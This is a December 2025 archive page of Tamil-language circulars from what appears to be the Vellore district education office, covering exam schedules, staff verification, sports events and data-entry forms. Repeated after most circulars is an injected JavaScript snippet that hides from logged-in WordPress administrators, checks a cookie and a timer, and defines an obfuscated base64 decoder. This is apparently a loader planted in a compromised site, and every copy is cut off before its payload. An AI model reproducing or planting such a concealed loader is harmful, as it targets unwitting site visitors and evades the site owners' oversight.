Month: December 2025

ஆங்கில புத்தாண்டு வாழ்த்து மடல்

ஆங்கில புத்தாண்டு வாழ்த்து மடல்Download முதன்மைக் கல்வி அலுவலர், வேலுர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

தேர்வுகள் –வேலூர் மாவட்டம்-மார்ச்/ஏப்ரல் -2026 இடைநிலை மற்றும் மேல்நிலை பொதுத் தேர்வுகள் –பள்ளிகளில் பணிபுரியும் ஆசிரியர்கள் மற்றும் ஆசிரியரல்லாதோர் விவரம்(EBS படிவம்) பணியாளர்களின் விவரங்கள்  – பள்ளித் தலைமை ஆசிரியர்கள் –சரிப்பார்த்தல் –  தொடர்பாக

 அனைத்து அரசு / நகரவை /அரசு நிதியுதவி  /ஆதிதிராவிடர் நல உயர் மற்றும் மேல்நிலைப்பள்ளி தலைமையாசிரியர்கள் கவனத்திற்கு நடைபெறவிருக்கும் மார்ச் /ஏப்ரல் -2026  இடைநிலை மற்றும் மேல்நிலை பொதுத்தேர்வுகள் சார்பாக , பணிபுரியும் அனைத்து ஆசிரியர்கள் மற்றும் ஆசிரியரல்லாத பணியாளர்களின் விவரங்கள் வேலூர் மாவட்ட முதன்மைக் கல்வி அலுவலக இணையதளம் மூலும் பெறப்பட்டது. பெறப்பட்ட விவரங்கள் 12.12.2025 அன்று சுற்றறிக்கை அனுப்பிவைக்கப்படுகிறது.                   மேலும் இணைப்பில் தங்கள் பள்ளிகளில் பணிபுரியும் தலைமை ஆசிரியர் /ஆசிரியர்கள் மற்றும் ஆசிரியரல்லாதோர் விவரங்களை சரிபார்த்து எவர் பெயரும் விடுபடாமல் அனைத்து பதிவுகளும் சரியாக உள்ளது எனவும் அல்லது திருத்தங்கள் இருப்பின் திருத்தங்கள் மேற்கொண்டு  &nbs

பள்ளிக் கல்வி-வேலூர் மாவட்டம்- உடற்கல்வி- 2025-2026 ஆம் கல்வியாண்டில் மாநில அளவிலான 66வது குடியரசு தின/பாரதியார் தின குழு விளையாட்டுப் போட்டிகள்-குத்துச்சண்டை, சிலம்பம், வளையப்பந்து  -நடைபெறும் இடம் தேதி போன்ற விவரங்கள் தெரிவித்தல்-சார்பு

சார்ந்த பள்ளி தலைமையாசிரியர்கள்/முதல்வர்கள் கவனத்திற்கு Theni.RD.BD.Games (1)Download _RD.BD.NEWGAMES.DATE.VENUE & CONTACT DETAILS - THENI DISTRICT.MANAGER.INSTRUCTIONSDownload THENI.RD.BD.GAMES.STUDENTS.LISTDownload SOP for Protection of Girls in Sports_ Instructions (1)Download /ஒப்பம்/ முதன்மைக் கல்வி அலுவலர் வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

தேர்வுகள் –வேலூர் மாவட்டம் –2025-2026 மேல்நிலை இரண்டாம் ஆண்டு மேல்நிலை முதலாமாண்டு (Arrear) பொதுத் தேர்வு – மாணவர்களது பெயர்ப்பட்டியலில் திருத்தங்கள் மேற்கொள்ளுதல் கால அவகாசம் வழங்குதல் -சார்பு.

nominal roll correction & deletion & additionDownload                           //ஓம். //                                                                             முதன்மைக்கல்விஅலுவலர்                  

பள்ளிக் கல்வி -வேலூர் மாவட்டம் – அடிப்படைப்பணியாளர்களின் காலிப்பணியிட விவரம் கோருதல் -தொடர்பாக

பள்ளிக் கல்வி -வேலூர் மாவட்டம் - அடிப்படைப் பணியாளர்களின் காலிப்பணியிட விவரம் உடனடியாக இணைக்கப்பட்டுள்ள google sheet ல் உடனடியாக பூர்த்தி செய்யுமாறு அனைத்து வகை அரசு/நகராட்சி/ஆதிதிராவிடர் நல உயர்/மேல்நிலைப் பள்ளி தலைமையாசிரியர்கள் கேட்டுக்கொள்ளப்படுகிறார்கள். https://docs.google.com/spreadsheets/d/1w3CHfAAwUPcanCF3-cINAdW-UW1OVbn8mtZWzadhlCU/edit?usp=sharing முதன்மைக் கல்வி அலுவலர், வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function syste

தேர்வுகள் – வேலூர் மாவட்டம் – 2025-2026 -ம் கல்வியாண்டில் பள்ளிகளில் பயிலும் பத்தாம் வகுப்பு, மேல்நிலை முதலாம் ஆண்டு மற்றும்   இரண்டாம் ஆண்டு மாணவர்களுக்கான முதல் திருப்புதல் தேர்வுகள் தொடர்பாக தேர்வுக்கால அட்டவணை – தலைமையசிரியர்களுக்கு –   தெரிவித்தல் – சார்பு.

4379 FIRST REVISION TESTDownload FIRST REVISION - EXAM-2025-2026_ TIME TABLE 07.01Download https://docs.google.com/spreadsheets/d/1bz0a8nUgwqGAzpgJH9XX6V6zayuv5ZHxSCUgdUYzp94/edit?usp=sharing  //ஓம். // முதன்மைக் கல்வி அலுவலர், வேலூர்.   பெறுநர் அனைத்துவகை உயர்/மேல்நிலைப் பள்ளி தலைமை ஆசிரியர்கள் மற்றும்    மெட்ரிக் பள்ளி முதல்வர்கள். நகல்:- மாவட்டக் கல்வி அலுவலர்(இடைநிலை /தனியார்), வேலூர் அவர்களுக்கு தகவலுக்காகவுடம தொடர் நடவடிக்கைக்காகவும் அனுப்பலாகிறது. மாவட்டக் கல்வி அலுவலர்(தொடக்கக்கல்வி )அவர்களுக்கு தகவலின் பொருட்டு அனுப்பப்படுகிறது. வேலூர் மாவட்ட ஆட்சித் தலைவர் அவர்களுக்கு தகவலின் பொருட்டு அனுப்பிவைக்கப்படுகிறது. (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Dat

தேர்வுகள் –வேலூர் மாவட்டம் –2025-2026 கல்வியாண்டு மார்ச்/ஏப்ரல்-2026 மேல்நிலை பொதுத்தேர்வு –விடைத்தாள் திருத்தும்  பணி -விருப்பமுள்ள விடைத்தாள் திருத்தும் மையம் தேர்வு செய்து அனுப்புதல் –தொடர்பாக

4379 pg valuation countDownload https://docs.google.com/spreadsheets/d/1YKXEtpRjT9F98mIpx02Wn3ExOLMUSVNxYtagU8T7uNg/edit?usp=sharing //ஒம். // முதன்மைக்கல்விஅலுவலர்,                                                                            &nbs

தேர்வுகள் –வேலூர் மாவட்டம் –மேல்நிலை இரண்டாமாண்டு  –மார்ச் 2026  –தேர்வு மையங்கள்  பட்டியல் மற்றும் இணைப்பு பள்ளிகள் சரிபார்த்தல் –பள்ளிகளுக்கு தெரிவித்தல் –சார்பு    

4379 DCS PROCEEDINGSDownload 32 VELLOREDownload  தொடர்புக்கு : 9791888163 //ஓம். //                                                                              முதன்மைக் கல்வி அலுவலர்,      வேலூர்.   இணைப்பு மேல்நிலை இ

தமிழ்நாடு மேல்நிலைக் கல்வி – வேலூர் மாவட்டம் – அரசு / நகராட்சி மேல்நிலைப் பள்ளித் தலைமை ஆசிரியர்கள் – 01.01.2023 மற்றும் 01.01.2024 நிலவரப்படி பதவி உயர்வு வழங்கப்பட்ட தலைமை ஆசிரியர்களுக்கு பணிவரன் முறை செய்ய கருத்துருக்கள் 29.12.2025 -க்குள் அனுப்ப கோருதல் – சார்ந்து REVISED – படிவம் – அனுப்புதல் – சார்பு.

6343 b1 2025 PROMOTION - GHSS HM_compressedDownload 65810-2025 HSS Hms Regularisation_Annexure-I-R2Download 65810-2025 HSS Hms Regularisation_Format-R1Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – அனைத்து வகை உயர்/ மேல்நிலைப் பள்ளித் தலைமை ஆசிரியர்கள் கீழே கொடுக்கப்பட்டுள்ள Google Form -ல் திறன் மாணவர்களின் டிசம்பர் 2025 தேர்வு மதிப்பெண் விவரங்களை கொடுக்கப்பட்டுள்ள எக்ஸல் படிவத்தில் பூர்த்தி செய்து 30.12.2025 -க்குள் பதிவிடுமாறு கேட்டுக் கொள்ளப்படுகிறார்கள்.

https://docs.google.com/forms/d/e/1FAIpQLSeK2OiiEhlmZs3ZIN1MjtJeq1NTcUMqaCICbvSlrQGuidGN2A/viewform?usp=publish-editor Thiran_December 2025 BLO ReportDownload முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i